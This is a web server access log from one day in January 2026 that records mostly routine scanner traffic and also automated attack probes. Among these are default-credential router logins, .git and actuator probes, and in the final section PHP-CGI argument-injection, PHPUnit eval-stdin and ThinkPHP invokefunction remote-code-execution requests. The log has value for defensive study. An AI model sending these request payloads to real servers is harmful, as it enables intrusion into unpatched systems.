+[14/Jan/2026:11:56:27 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[14/Jan/2026:12:06:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:12:21:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 92.63.197.50] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:12:21:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 92.63.197.50] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[14/Jan/2026:12:23:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:12:28:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:12:38:59 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:12:41:26 +0000] 200 - GET http 92.249.249.197 "/" [Client 184.105.139.70] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" "-" +[14/Jan/2026:12:43:10 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:12:43:41 +0000] 404 - GET http 92.249.249.197 "/webui/" [Client 184.105.139.70] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" "-" +[14/Jan/2026:12:49:52 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[14/Jan/2026:12:52:16 +0000] 404 - GET http 92.249.249.197 "/geoserver/web/" [Client 184.105.139.70] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" "-" +[14/Jan/2026:12:55:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:13:00:28 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=ec8&psd=ec8" [Client 94.243.8.138] [Length 150] [Gzip -] "-" "-" +[14/Jan/2026:13:14:59 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[14/Jan/2026:13:16:16 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:13:18:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:13:24:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 84.17.55.211] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:13:30:26 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:13:46:31 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:13:56:19 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[14/Jan/2026:14:09:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:14:12:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:14:12:19 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 142.93.235.170] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[14/Jan/2026:14:12:19 +0000] 400 - GET http profibot.direct.quickconnect.to "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[14/Jan/2026:14:35:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:14:51:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 130.12.180.2] [Length 1033] [Gzip -] "Hello World" "-" +[14/Jan/2026:14:51:53 +0000] 404 - POST http 92.249.249.197 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://92.249.249.197:80/home.asp" +[14/Jan/2026:15:03:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:15:03:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:15:04:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:15:05:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.71] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[14/Jan/2026:15:13:32 +0000] 200 - GET http 92.249.249.197 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[14/Jan/2026:15:25:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:15:33:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:15:45:00 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 93.123.72.132] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:15:50:15 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:15:55:22 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:15:57:51 +0000] 400 - GET http 92.249.249.197 "/" [Client 134.199.146.250] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[14/Jan/2026:15:57:52 +0000] 400 - GET http 92.249.249.197 "/t4" [Client 134.199.146.250] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[14/Jan/2026:15:57:52 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 134.199.146.250] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[14/Jan/2026:16:03:54 +0000] 200 - GET http 92.249.249.197 "/" [Client 147.182.200.141] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[14/Jan/2026:16:04:00 +0000] 400 - GET http 92.249.249.197 "/" [Client 128.1.44.228] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[14/Jan/2026:16:05:41 +0000] 404 - GET http 92.249.249.197 "/.git/HEAD" [Client 77.83.39.162] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 6.0; LG-D850 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.97 Mobile Safari/537.36" "-" +[14/Jan/2026:16:05:54 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:16:14:45 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:16:28:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:16:30:07 +0000] 404 - GET http 92.249.249.197 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[14/Jan/2026:16:41:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:16:49:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[14/Jan/2026:16:56:49 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:17:03:41 +0000] 400 - GET http 92.249.249.197 "/" [Client 92.63.197.197] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0" "-" +[14/Jan/2026:17:06:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:17:25:37 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:17:31:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:17:45:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:17:46:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:17:54:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:18:03:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:18:12:43 +0000] 404 - GET http 92.249.249.197 "/admin/config.php" [Client 91.232.238.112] [Length 150] [Gzip -] "xfa1" "-" +[14/Jan/2026:18:20:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:18:25:59 +0000] 404 - GET http 92.249.249.197 "/login.asp" [Client 95.214.55.71] [Length 150] [Gzip -] "-" "-" +[14/Jan/2026:18:45:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:18:46:18 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:18:56:40 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.71] [Length 568] [Gzip 1.86] "-" "-" +[14/Jan/2026:18:58:24 +0000] 200 - GET http 92.249.249.197 "/" [Client 98.94.74.185] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[14/Jan/2026:18:59:12 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[14/Jan/2026:19:11:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:19:11:06 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 159.203.80.173] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[14/Jan/2026:19:11:06 +0000] 400 - GET http profibot.direct.quickconnect.to "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[14/Jan/2026:19:28:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:19:36:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:19:41:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:19:47:05 +0000] 404 - GET http 92.249.249.197 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:19:57:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:20:01:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:20:05:06 +0000] 400 - GET http 92.249.249.197 "/page/style/index.css" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[14/Jan/2026:20:15:24 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 190.129.122.221] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:20:15:25 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 190.129.122.221] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:20:15:25 +0000] 404 - POST http 92.249.249.197 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:26 +0000] 405 - POST http 92.249.249.197 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 190.129.122.221] [Length 154] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:26 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:27 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:27 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:27 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:28 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:28 +0000] 404 - GET http 92.249.249.197 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:28 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:29 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:29 +0000] 404 - GET http 92.249.249.197 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:29 +0000] 404 - GET http 92.249.249.197 "/phpunit/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:30 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:30 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:30 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:31 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:31 +0000] 404 - GET http 92.249.249.197 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:32 +0000] 404 - GET http 92.249.249.197 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:32 +0000] 404 - GET http 92.249.249.197 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:33 +0000] 404 - GET http 92.249.249.197 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:33 +0000] 404 - GET http 92.249.249.197 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:33 +0000] 404 - GET http 92.249.249.197 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:34 +0000] 404 - GET http 92.249.249.197 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:34 +0000] 404 - GET http 92.249.249.197 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:34 +0000] 404 - GET http 92.249.249.197 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:35 +0000] 404 - GET http 92.249.249.197 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:35 +0000] 404 - GET http 92.249.249.197 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:35 +0000] 404 - GET http 92.249.249.197 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:36 +0000] 404 - GET http 92.249.249.197 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:36 +0000] 404 - GET http 92.249.249.197 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:37 +0000] 404 - GET http 92.249.249.197 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:37 +0000] 404 - GET http 92.249.249.197 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:38 +0000] 404 - GET http 92.249.249.197 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:38 +0000] 404 - GET http 92.249.249.197 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:39 +0000] 404 - GET http 92.249.249.197 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:39 +0000] 404 - GET http 92.249.249.197 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:39 +0000] 404 - GET http 92.249.249.197 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:40 +0000] 404 - GET http 92.249.249.197 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:40 +0000] 404 - GET http 92.249.249.197 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:40 +0000] 404 - GET http 92.249.249.197 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:41 +0000] 404 - GET http 92.249.249.197 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 190.129.122.221] [Length 150] [Gzip -] 